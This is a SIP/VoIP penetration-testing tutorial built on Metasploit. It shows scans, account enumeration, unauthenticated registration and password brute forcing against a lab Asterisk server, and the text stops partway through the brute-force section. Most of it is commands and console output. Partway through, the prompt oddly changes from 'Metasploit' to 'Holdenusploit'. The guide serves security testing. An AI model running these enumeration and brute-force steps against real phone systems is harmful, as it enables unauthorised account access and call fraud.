Penetration Testing SIP Services

Penetration Testing SIP Services Using Metasploit Framework Writer Version : 0.2 : Fatih Özavcı (fatih.ozavci at viproy.com)

Introduction Viproy VoIP Penetration Testing Kit Sayfa 2

Table of Contents 1 Discovering SIP Services and Devices...5 1.1 Discovering Active SIP Services and Devices...5 1.2 Enumerating SIP Services...13 2 Authentication Analysis of SIP Services...19 2.1 SIP Server Registration Without Authentication...19 2.2 Brute Forcing Target Accounts...23 3 Authorization Analysis of SIP Services...30 3.1 Direct Invite Attempt...30 Viproy VoIP Penetration Testing Kit Sayfa 3

Illustrations Detecting Active Devices and Port Scan for Services...7 UDP Discovery for Active Devices...9 SIP Service Discovery via Generic OPTIONS Auxiliary Module...10 SIP Service Discovery via OPTIONS Module...11 SIP Service Discovery via REGISTER Module...12 Account Enumeration via INVITE Method...15 Account Enumeration via SUBSCRIBE Method...16 Account Enumeration via REGISTER Method...18 Account Enumeration with a User File...19 SIP Server Registration Without Authentication...22 Brute Forcing a Valid Account with a Password File...25 Brute Forcing a Account File with a Password File...27 Brute Forcing Numeric Accounts with a Password File...29 Viproy VoIP Penetration Testing Kit Sayfa 4

1 Discovering SIP Services and Devices 1.1 Discovering Active SIP Services and Devices Many servers and network devices have SIP services for special purposes. This purpose could be a commercial service, internal communication of a company, communication between different sites or by default device installation. First step of the SIP audit is discovering related devices and mapping of the SIP network. This step is required to understand the scope and target SIP services usage. Purpose of the SIP services, version and type of the service softwares, device management procedures and type of the SIP clients must be known before penetration testing. Discovering SIP services is the first step of the audit and there are many ways to detect SIP devices. Ping sweep, TCP/UDP sweeps or ARP discovery methods are available to discover active devices. Most of these methods are not efficient with a well-designed firewall, because only SIP services could be permitted via firewall. Also discovering an active device is not efficient without identification and enumeration. Based on this requirement, SIP based devices could be identified using service identification and device fingerprints. Required Minimum Results for Discovery Step IP Addresses of Active SIP Devices Operating System and Version of Active SIP Devices Service Software and Version of SIP Services Role of SIP Services (Call Manager, Proxy, Gateway) This chapter explains SIP services analysis with Metasploit Framework and it has many auxiliary modules to discover the active devices. Ping sweep and port scanning are basic discovery methods. Active devices could be detected a ping sweep and then a port scan could be performed for active services on detected device. Nmap is the best network mapping software and it is available in Metasploit Framework for all scanning functions. -sp parameter should be selected for ping sweep and -PX parameters such as -PI, -PS, -PSA, -PT available for ping type. Port scan is more complicated, -sx parameters such as -ss, -st, -su define port scan type. Moreover, each port scan type has different requirements and additional parameters; such as -sv for service identification and -p1-65535 o r -F parameters for target ports. Nmap manual guide is very helpful for different scan types and parameters. Viproy VoIP Penetration Testing Kit Sayfa 5

In our example; first of all an ICMP based ping sweep performed, then a port scan performed with os identification and script modules. When Nmap scan is finished, results stored to the DB of Metasploit Framework. Scan results are accessible via hosts, services and vulns commands. Metasploit # db_nmap -sp -PI 172.16.100.1-10 [*] Nmap: Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-25 15:46 EET [*] Nmap: Nmap scan report for 172.16.100.1 [*] Nmap: Host is up. [*] Nmap: Nmap scan report for 172.16.100.6 [*] Nmap: Host is up (0.00060s latency). [*] Nmap: MAC Address: 08:00:27:38:4E:0A (Cadmus Computer Systems) [*] Nmap: Nmap done: 10 IP addresses (2 hosts up) scanned in 0.33 seconds Metasploit # db_nmap -ss -sv -A -O -p1-65535 172.16.100.6 [*] Nmap: Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-25 15:46 EET [*] Nmap: Nmap scan report for 172.16.100.6 [*] Nmap: Host is up (0.0048s latency). [*] Nmap: Not shown: 65527 closed ports [*] Nmap: PORT STATE SERVICE VERSION [*] Nmap: 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) [*] Nmap: ssh-hostkey: 1024 1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA) [*] Nmap: _2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA) [*] Nmap: 53/tcp open domain dnsmasq 2.45 [*] Nmap: dns-nsid: [*] Nmap: _ bind.version: dnsmasq-2.45 [*] Nmap: 80/tcp open http Apache httpd 2.2.3 ((CentOS)) [*] Nmap: _http-title: FreePBX [*] Nmap: http-methods: Potentially risky methods: TRACE [*] Nmap: _See http://nmap.org/nsedoc/scripts/http-methods.html [*] Nmap: http-robots.txt: 1 disallowed entry [*] Nmap: _/ [*] Nmap: 111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000) [*] Nmap: rpcinfo: [*] Nmap: program version port/proto service [*] Nmap: 100000 2 111/tcp rpcbind [*] Nmap: 100000 2 111/udp rpcbind [*] Nmap: 100024 1 746/udp status [*] Nmap: _ 100024 1 749/tcp status [*] Nmap: 749/tcp open status (status V1) 1 (rpc #100024) [*] Nmap: 3306/tcp open mysql MySQL (unauthorized) [*] Nmap: 4445/tcp open upnotifyp? Viproy VoIP Penetration Testing Kit Sayfa 6

[*] Nmap: 5038/tcp open asterisk Asterisk Call Manager 1.1 [*] Nmap: MAC Address: 08:00:27:38:4E:0A (Cadmus Computer Systems) [*] Nmap: Device type: general purpose [*] Nmap: Running: Linux 2.6.X [*] Nmap: OS CPE: cpe:/o:linux:kernel:2.6.22 [*] Nmap: OS details: Linux 2.6.22 [*] Nmap: Network Distance: 1 hop [*] Nmap: TRACEROUTE [*] Nmap: HOP RTT ADDRESS [*] Nmap: 1 4.77 ms 172.16.100.6 [*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 129.76 seconds Metasploit # hosts Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 172.16.100.6 08:00:27:38:4E:0A Linux 2.6.X device Metasploit # services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 172.16.100.6 22 tcp ssh open OpenSSH 4.3 protocol 2.0 172.16.100.6 53 tcp domain open dnsmasq 2.45 172.16.100.6 80 tcp http open Apache httpd 2.2.3 (CentOS) 172.16.100.6 111 tcp rpcbind open 2 rpc #100000 172.16.100.6 749 tcp status open 1 rpc #100024 172.16.100.6 3306 tcp mysql open MySQL unauthorized 172.16.100.6 4445 tcp upnotifyp open 172.16.100.6 5038 tcp asterisk open Asterisk Call Manager 1.1 Detecting Active Devices and Port Scan for Services Viproy VoIP Penetration Testing Kit Sayfa 7

As you can see, port scan results didn't have any information about SIP services. Because SIP services are available via UDP protocol in most cases. VoIP administrators don't like SIP over TCP, because it is low performance alternative when comparing SIP over UDP. In our port scan, we scanned only TCP ports via -ss parameter and it couldn't detect any SIP over TCP services. Metasploit Framework has a few auxiliary modules for UDP discovery. These modules send valid UDP requests to related services, then target open ports send a response and this response could use for identification. auxiliary/scanner/discovery/udp_sweep module used for UDP scanning and results presented below. Metasploit # use auxiliary/scanner/discovery/udp_sweep Metasploit auxiliary(udp_sweep) # show options Module options (auxiliary/scanner/discovery/udp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads Metasploit auxiliary(udp_sweep) # set RHOSTS 172.16.100.6 RHOSTS => 172.16.100.6 Metasploit auxiliary(udp_sweep) # set THREADS 10 THREADS => 10 Metasploit auxiliary(udp_sweep) # run [*] Sending 12 probes to 172.16.100.6->172.16.100.6 (1 hosts) [*] Discovered DNS on 172.16.100.6:53 (f338858000010001000000000756455253494f4e0442494e440000100003c00c00100003 00000000000d0c646e736d6173712d322e3435) [*] Discovered Portmap on 172.16.100.6:111 (100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(746), 100024 v1 TCP(749)) [*] Scanned 1 of 1 hosts (100% complete) Viproy VoIP Penetration Testing Kit Sayfa 8

Metasploit auxiliary(udp_sweep) # services Services ======== host port proto name state info ---- ---- ----- ---- ----- ---- 172.16.100.6 22 tcp ssh open OpenSSH 4.3 protocol 2.0 172.16.100.6 53 udp dns open f338858000010001000000000756455253494f4e0442494e440000100003c00c001000030 0000000000d0c646e736d6173712d322e3435 172.16.100.6 53 tcp domain open dnsmasq 2.45 172.16.100.6 80 tcp http open Apache httpd 2.2.3 (CentOS) 172.16.100.6 111 udp portmap open 100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(746), 100024 v1 TCP(749) 172.16.100.6 111 tcp sunrpc open 100000 v2 172.16.100.6 746 udp sunrpc open 100024 v1 172.16.100.6 749 tcp sunrpc open 100024 v1 172.16.100.6 3306 tcp mysql open MySQL unauthorized 172.16.100.6 4445 tcp upnotifyp open 172.16.100.6 5038 tcp asterisk open Asterisk Call Manager 1.1 UDP Discovery for Active Devices Unfortunately this UDP scanning module has support for rpc, dns, netbios, portmap, mssql, ntp, snmp, sentinel and citrix services not SIP services. It is not efficient for detecting SIP services too. Correct discovery method for detecting SIP service is sending valid SIP requests to the target SIP services. Metasploit has an auxiliary module for this purpose, it's name is auxiliary/scanner/sip/options. This module sends OPTIONS request to the target SIP service, then it reports Server: header and available methods. In our case, this SIP software is Asterisk PBX 1.6.2.11. Metasploit # use auxiliary/scanner/sip/options Metasploit auxiliary(options) # show options Module options (auxiliary/scanner/sip/options): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address Viproy VoIP Penetration Testing Kit Sayfa 9

CPORT 5060 no The local client port RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO nobody no The destination username to Metasploit auxiliary(options) # set RHOSTS 172.16.100.6 RHOSTS => 172.16.100.6 Metasploit auxiliary(options) # run [*] 172.16.100.6 200 server='asterisk PBX 1.6.2.11' verbs='invite, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] Scanned 1 of 1 hosts (100% complete) SIP Service Discovery via Generic OPTIONS Auxiliary Module I developed a SIP library for Metasploit Framework and a few modules for demonstration, such as OPTIONS module named auxiliary/gamasec/sip/gsipoptions. It can be useful for service detection and discovering additional information about the target service. Sample usage of this module is presented below. Metasploit # use auxiliary/gamasec/sip/gsipoptions Metasploit auxiliary(gsipoptions) # set RHOSTS 172.16.100.6 RHOSTS => 172.16.100.6 Metasploit auxiliary(gsipoptions) # set VERBOSE true VERBOSE => true Metasploit auxiliary(gsipoptions) # show options Module options (auxiliary/gamasec/sip/gsipoptions): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT 5065 no The local client port DEBUG 0 no Debug Level FROM 100 yes The source username to probe at each host REALM realm.com.tr yes The login realm to probe at each host Viproy VoIP Penetration Testing Kit Sayfa 10

RHOSTS 172.16.100.6 yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO 100 yes The destination username to probe at each host Metasploit auxiliary(gsipoptions) # run [+] 172.16.100.6:5060 Response: 200 OK [*] Server : Asterisk PBX 1.6.2.11 [*] Scanned 1 of 1 hosts (100% complete) SIP Service Discovery via OPTIONS Module OPTIONS is not the only method to discover a SIP Service, other methods could be required under IP or Request based filtering. Because of this requirement, other developed modules REGISTER, INVITE and SUBSCRIBE could use for discovery. A discovery attempt based on REGISTER method is presented below. REGISTER module's name is auxiliary/gamasec/sip/gsipregister. After an execution with default parameters, it reports that the target SIP service requires authentication. If target number TO changed to 100 and login parameter USER_AS_FROM_and_TO changed to false, it reports that the target service accepts registration. As you can see in this example, discovering and understanding of SIP service require a few probes. Also other options or other modules could use for discovery such as INVITE and SUBSCRIBE. Metasploit # use auxiliary/gamasec/sip/gsipregister Metasploit auxiliary(gsipregister) # set RHOSTS 172.16.100.6 RHOSTS => 172.16.100.6 Metasploit auxiliary(gsipregister) # show options Module options (auxiliary/gamasec/sip/gsipregister): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level DEREGISTER false yes DeRegister After Successful Login Viproy VoIP Penetration Testing Kit Sayfa 11

FROM 1000 no The source username to LOGIN false yes Login Using Credentials PASSWORD NOPASSWORD yes The login password to REALM realm.com.tr yes The login realm to RHOSTS 172.16.100.6 yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to USERNAME NOUSER yes The login username to USER_AS_FROM_and_TO true no Use the Username for From and To fields Metasploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized [*] Server : Asterisk PBX 1.6.2.11 [*] Realm : asterisk [*] Scanned 1 of 1 hosts (100% complete) Metasploit auxiliary(gsipregister) # set TO 100 TO => 100 Metasploit auxiliary(gsipregister) # set USER_AS_FROM_and_TO false USER_AS_FROM_and_TO => false Metasploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Response: 200 OK [*] Server : Asterisk PBX 1.6.2.11 [*] Scanned 1 of 1 hosts (100% complete) SIP Service Discovery via REGISTER Module Another tools such as sipsak, sipp or sipvicious could be used for detection or identification. But these tools have some disadvantages and less features, also these tools couldn't integrate a penetration testing framework. Because of that, in the discovery and identification step of penetration testing, they are not recommended to use. Viproy VoIP Penetration Testing Kit Sayfa 12

1.2 Enumerating SIP Services Enumeration is required for feature and authorization testing of SIP services. Valid accounts, internal call schema, dial plan, special dial targets, prefixes for gateways, value added services and voice message box should be defined as enumeration targets. Enumeration is possible using different SIP requests such as OPTIONS, REGISTER, SUBSCRIBE and INVITE. Enumeration step should be correctly defined and all available methods should be used, because each request type has own conditions and responses. Different types of enumeration are presented in this chapter, each method should be performed to target SIP services. Required Minimum Results for Enumeration Step Valid Prefixes and Special Gateways on SIP Service Valid Accounts and Target Numbers on SIP Service Voice Message Box of SIP Service Accounts or Numbers Without Password on SIP Service INVITE method is available to initiate a call to the target number on SIP service with or without authentication. Server could send different responses for some TO fields in INVITE requests such as 404 Not Found, 401 Unauthorized or 403 Forbidden, this difference should be base for enumeration. For example, if 401 Unauthorized or 200 OK responses received only for valid targets, an enumeration should be defined to search all users with 401 Unauthorized or 200 OK. Based on this fact, users with 401 Unauthorized or 200 OK responses should be identified as a valid account, target number, vas service or gateway. If authentication is required before INVITE requests, enumeration should be designed for that. For INVITE based enumeration, my sip enumeration module could be used. This module support for REGISTER, SUBSCRIBE and INVITE methods to enumerate target accounts. Also it is useful to enumerate and identify value added services, prefixes, gateways or number based trunks. This module supports authentication, if server requires authentication it calculates nonce and send with given credentials. Authentication feature could be activated with LOGIN, USERNAME, PASSWORD and REALM variables. INVITE method selected with NUMERIC_USERS in this example, NUMERIC_MAX variable is defined to limit enumeration. Double responses mean server sends many 200 OK or 401 Unauthorized results, this is side-effect of a direct INVITE request. Another side-effect of INVITE is all detected numbers should be rang. Viproy VoIP Penetration Testing Kit Sayfa 13

Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator Holdenusploit auxiliary(gsipenumerator) # set METHOD INVITE METHOD => INVITE Holdenusploit auxiliary(gsipenumerator) # unset USERNAME Unsetting USERNAME... Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS true NUMERIC_USERS => true Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100 NUMERIC_MAX => 2100 Holdenusploit auxiliary(gsipenumerator) # show options Module options (auxiliary/gamasec/sip/gsipenumerator): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level FROM 1000 no The source username to METHOD INVITE yes Method for Brute Force (SUBSCRIBE,REGISTER,INVITE) NUMERIC_MAX 2100 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS true yes Numeric Username Bruteforcing REALM realm.com.tr yes The login realm to RHOST 172.16.100.6 yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to USERNAME NOUSER no The login username to USER_AS_FROM_and_TO true yes Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Holdenusploit auxiliary(gsipenumerator) # run Viproy VoIP Penetration Testing Kit Sayfa 14

[+] user : 101 is Found, Server Response: 401 Unauthorized [+] user : 102 is Found, Server Response: 401 Unauthorized [+] user : 200 is Found, Server Response: 401 Unauthorized [+] user : 201 is Found, Server Response: 401 Unauthorized [+] user : 2000 is Found, Server Response: 401 Unauthorized [+] user : 200 is Found, Server Response: 401 Unauthorized [+] user : 201 is Found, Server Response: 401 Unauthorized [+] user : 2000 is Found, Server Response: 401 Unauthorized Account Enumeration via INVITE Method SUBSCRIBE method is available to subscribe an account to the target SIP service with or without authentication. Server could send different responses for some TO fields in SUBSCRIBE requests such as 404 Not Found, 401 Unauthorized or 403 Forbidden, this difference should be base for enumeration. For example, if 401 Unauthorized or 200 OK responses received only for valid targets, an enumeration should be defined to search all users with 401 Unauthorized or 200 OK. Based on this fact, users with 401 Unauthorized or 200 OK responses should be identified as a valid account, target number, vas service or gateway. If server sends different responses for SUBSCRIBE requests, first enumeration method should SUBSCRIBE for less damage not INVITE or REGISTER. As mentioned above my sip enumeration module could be used for SUBSCRIBE based enumeration. This module useful to enumerate and identify value added services, prefixes, gateways or number based trunks. This module supports authentication, if server requires authentication it calculates nonce and send with given credentials. Authentication feature could be activated with LOGIN, USERNAME, PASSWORD and REALM variables. SUBSCRIBE method selected with NUMERIC_USERS in this example, NUMERIC_MAX variable is defined to limit enumeration. Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator Holdenusploit auxiliary(gsipenumerator) # unset USERNAME Unsetting USERNAME... Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS true NUMERIC_USERS => true Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100 NUMERIC_MAX => 2100 Holdenusploit auxiliary(gsipenumerator) # set METHOD SUBSCRIBE METHOD => SUBSCRIBE Holdenusploit auxiliary(gsipenumerator) # show options Module options (auxiliary/gamasec/sip/gsipenumerator): Name Current Setting Required Description Viproy VoIP Penetration Testing Kit Sayfa 15

---- --------------- -------- ----------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level FROM 1000 no The source username to METHOD SUBSCRIBE yes Method for Brute Force (SUBSCRIBE,REGISTER,INVITE) NUMERIC_MAX 2100 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS true yes Numeric Username Bruteforcing REALM realm.com.tr yes The login realm to RHOST 172.16.100.6 yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to USERNAME NOUSER no The login username to USER_AS_FROM_and_TO true yes Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Holdenusploit auxiliary(gsipenumerator) # run [+] user : 101 is Found, Server Response: 401 Unauthorized [+] user : 102 is Found, Server Response: 401 Unauthorized [+] user : 200 is Found, Server Response: 401 Unauthorized [+] user : 201 is Found, Server Response: 401 Unauthorized [+] user : 2000 is Found, Server Response: 401 Unauthorized Account Enumeration via SUBSCRIBE Method Viproy VoIP Penetration Testing Kit Sayfa 16

REGISTER method is available to register an account to the target SIP service with or without authentication. Server could send different responses for some TO fields in REGISTER requests such as 404 Not Found, 401 Unauthorized or 403 Forbidden, this difference should be base for enumeration. For example, if 401 Unauthorized or 200 OK responses received only for valid targets, an enumeration should be defined to search all users with 401 Unauthorized or 200 OK. Based on this fact, users with 401 Unauthorized or 200 OK responses should be identified as a valid account, target number, vas service or gateway. As mentioned above my sip enumeration module could be used for REGISTER based enumeration. This module useful to enumerate and identify value added services, prefixes, gateways or number based trunks. REGISTER method selected with NUMERIC_USERS in this example, NUMERIC_MAX variable is defined to limit enumeration. Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator Holdenusploit auxiliary(gsipenumerator) # set METHOD REGISTER METHOD => REGISTER Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100 NUMERIC_MAX => 2100 Holdenusploit auxiliary(gsipenumerator) # unset USERNAME Unsetting USERNAME... Holdenusploit auxiliary(gsipenumerator) # show options Module options (auxiliary/gamasec/sip/gsipenumerator): Name Current Setting Required Description ---- --------------- -------- ----------- BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level FROM 1000 no The source username to METHOD REGISTER yes Method for Brute Force (SUBSCRIBE,REGISTER,INVITE) NUMERIC_MAX 2100 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS true yes Numeric Username Bruteforcing REALM realm.com.tr yes The login realm to Viproy VoIP Penetration Testing Kit Sayfa 17

RHOST 172.16.100.6 yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to USERNAME NOUSER no The login username to USER_AS_FROM_and_TO true yes Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts Holdenusploit auxiliary(gsipenumerator) # run [+] user : 100 is Found, Server Response: 200 OK Account Enumeration via REGISTER Method All SIP service accounts could be alphanumeric value, this means numeric REGISTER enumeration couldn't performed this type of systems. In this situation other enumeration methods should be used or wordlist based brute force should be performed. Wordlist based REGISTER enumeration requires a large user list to confirm. My enumeration module supports this type of enumeration too, it is available for all enumeration types. User list should be defined in USER_FILE variable, also NUMERIC_USERS variable should be false. 3 enumeration types are performed with a wordlist in next example. Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS false NUMERIC_USERS => false Holdenusploit auxiliary(gsipenumerator) # set METHOD REGISTER METHOD => REGISTER Holdenusploit auxiliary(gsipenumerator) # set USER_FILE "/tmp/users" USER_FILE => /tmp/users Holdenusploit auxiliary(gsipenumerator) # run [+] user : 100 is Found, Server Response: 200 OK Holdenusploit auxiliary(gsipenumerator) # set METHOD SUBSCRIBE METHOD => SUBSCRIBE Viproy VoIP Penetration Testing Kit Sayfa 18

Holdenusploit auxiliary(gsipenumerator) # run [+] user : 2000 is Found, Server Response: 401 Unauthorized Holdenusploit auxiliary(gsipenumerator) # set METHOD INVITE METHOD => INVITE Holdenusploit auxiliary(gsipenumerator) # run [+] user : 2000 is Found, Server Response: 401 Unauthorized Account Enumeration with a User File REGISTER response and SUBSCRIBE/INVITE responses are different, because all accounts enumerated with own condition. 100 is a special accounts, it doesn't need any password authentication with REGISTER method. REGISTER only identifies 100, because 2000 and other invalid numbers need authentication. SUBSCRIBE only identifies 2000, because SUBSCRIBE method for 100 not available. INVITE only identifies 2000, because call conditions of 100 are different from other accounts. All methods should be performed for full enumeration and discovery, because all methods have advantages and disadvantages. Another important case is server specific behaviors. OPTIONS method is available to check remote SIP service state and valid SIP methods. Servers and clients use this method to confirm their connection and availability of service. OPTIONS method should have same 200 OK result for all accounts and numbers, normally. In some cases, server could send different responses for some FROM or TO fields in OPTIONS requests, this difference should be base for enumeration. For example, if 404 Not Found response received for all numbers except valid accounts, an enumeration should be defined to search all users without 404 Not Found. Based on this fact, users without 404 Not Found response should be valid accounts, target numbers or both. This type of special enumeration cases could be performed with a few modifications in my module. Viproy VoIP Penetration Testing Kit Sayfa 19

2 Authentication Analysis of SIP Services 2.1 SIP Server Registration Without Authentication Authentication function depends on SIP service features and role. Authentication feature could be not required or initiated on SIP trunks, SIP clients and default installations. Generally, SIP trunks defined as an IP address or specific FROM number. Challenge response or certificate based authentication is slow for quick response in this type of large call counts. Because of that, SIP trunks have no password or IP based filter applied for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Many SIP clients have REGISTER and INVITE support without authentication. SIP servers and devices cannot authenticate users without right configuration, most of default installations do not support authentication. Moreover, SIP servers have special target numbers to accept call for voice message box, value added services or gateways. Registration without password is possible in this kind of configuration. Based on these informations, all SIP servers should be analyzed for weak authentication and special target numbers without authentication. REGISTER method should be used to register a SIP server, also this method supports authentication. In this example, SIP server analyzed for REGISTER without authentication. My register module could be used for REGISTER tests, it supports basic REGISTER options. 2000 is valid, NOUSER is invalid usernames for SIP server. Firstly, SIP server analyzed for USERNAME variable (in this case NOUSER and 2000) and 401 Unauthorized received. Holdenusploit # use auxiliary/gamasec/sip/gsipregister Holdenusploit auxiliary(gsipregister) # show options Module options (auxiliary/gamasec/sip/gsipregister): Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level DEREGISTER false yes DeRegister After Successful Login FROM 1000 no The source username to Viproy VoIP Penetration Testing Kit Sayfa 20

LOGIN false yes Login Using Credentials PASSWORD NOPASSWORD yes The login password to REALM realm.com.tr yes The login realm to RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to USERNAME NOUSER yes The login username to USER_AS_FROM_and_TO true no Use the Username for From and To fields Holdenusploit auxiliary(gsipregister) # set RHOSTS 172.16.100.6 RHOSTS => 172.16.100.6 Holdenusploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized [*] Server : Asterisk PBX 1.6.2.11 [*] Realm : asterisk [*] Scanned 1 of 1 hosts (100% complete) Holdenusploit auxiliary(gsipregister) # set USERNAME 2000 USERNAME => 2000 Holdenusploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized [*] Server : Asterisk PBX 1.6.2.11 [*] Realm : asterisk [*] Scanned 1 of 1 hosts (100% complete) USER_AS_FROM_AND_TO variable is useful when a SIP server requires FROM and TO field should be USERNAME. In this case, USER_AS_FROM_AND_TO variable changed to false and TO changed to 100. REGISTER request initiated with 1000 for FROM field and 100 for TO field, then 200 OK response received for this REGISTER attempt. This means SIP server accepts REGISTER requests with 1 condition, TO field must be 100. Viproy VoIP Penetration Testing Kit Sayfa 21

The target number 100 must be a kind of value added service number or number for special purpose. Holdenusploit auxiliary(gsipregister) # set USER_AS_FROM_and_TO false USER_AS_FROM_and_TO => false Holdenusploit auxiliary(gsipregister) # set TO 100 TO => 100 Holdenusploit auxiliary(gsipregister) # run [+] 172.16.100.6:5060 Response: 200 OK [*] Server : Asterisk PBX 1.6.2.11 [*] Scanned 1 of 1 hosts (100% complete) SIP Server Registration Without Authentication Special tests should be performed for other cases such as IP based filter, special FROM field or Proxy field. FROM field could be changed in my module and FROM based filtering could be bypassed. Proxy fields or IP based filtering could be performed only test specific. I will add Custom Header Support to my sip modules, this feature will help Proxy based tests. IP based tests will be demonstrated in INVITE tests for trunks, IP spoofing will be performed using hping3. Viproy VoIP Penetration Testing Kit Sayfa 22

2.2 Brute Forcing Target Accounts Registering a SIP server is the first step of the SIP service analysis and mostly it requires authentication. The authentication system of SIP service is based on challengeresponse. Challenge is nonce field of WWW-Authenticate:, 3 hashes should be calculated with this string. First hash is calculated like MD5(user:realm:password), second hash is calculated like MD5(requestname:uri) and final hash is calculated like (hash1:nonce:hash2). This final hash required when sending authentication information. Brute force attack should be performed in three types; to a confirmed account, to a user list in a file, to a numeric range. A powerful password wordlist file required for this brute force attack. Account password could be identified with this password file when an account confirmed. Another option is trying this password file for a user list or a numeric range. My brute force module supports all of these 3 attack types, with a password or a password file. Next examples include Brute Forcing methods and usage of modules. First Case : Brute Forcing a Valid Account with a Password File (Account User is 2000) Holdenusploit # use auxiliary/gamasec/sip/gsipbruteforce Holdenusploit auxiliary(gsipbruteforce) # show options Module options (auxiliary/gamasec/sip/gsipbruteforce): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS true no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 CHOST no The local client address CPORT 5065 no The local client port DEBUG false no Debug Level DEREGISTER false yes DeRegister After Successful Login FROM 1000 no The source username to probe METHOD REGISTER yes The method for Brute Forcing (REGISTER) NUMERIC_MAX 9999 yes Ending extension NUMERIC_MIN 0 yes Starting extension NUMERIC_USERS false yes Numeric Username Bruteforcing Viproy VoIP Penetration Testing Kit Sayfa 23

PASSWORD NOPASSWORD no The login password to probe PASS_FILE no File containing passwords, one per line REALM realm.com.tr yes The login realm to probe RHOST yes The target address RPORT 5060 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads TO 1000 no The destination username to probe USERNAME NOUSER no The login username to probe USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_FROM_and_TO true yes Try the username as the from/to for all users USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts Holdenusploit auxiliary(gsipbruteforce) # set USERNAME 2000 USERNAME => 2000 Holdenusploit auxiliary(gsipbruteforce) # set RHOST 172.16.100.6 RHOST => 172.16.100.6 Holdenusploit auxiliary(gsipbruteforce) # set PASS_FILE "/tmp/passwords" PASS_FILE => /tmp/passwords Holdenusploit auxiliary(gsipbruteforce) # run [*] Trying username:'2000' with password:'' [*] 172.16.100.6:5060 - [01/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'nopassword' [*] 172.16.100.6:5060 - [02/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) [*] Trying username:'2000' with password:'deneme1234' [*] 172.16.100.6:5060 - [03/11] - Authentication Failed : SIP/2.0 403 Forbidden (Bad auth) Viproy VoIP Penetration Testing Kit Sayfa 24

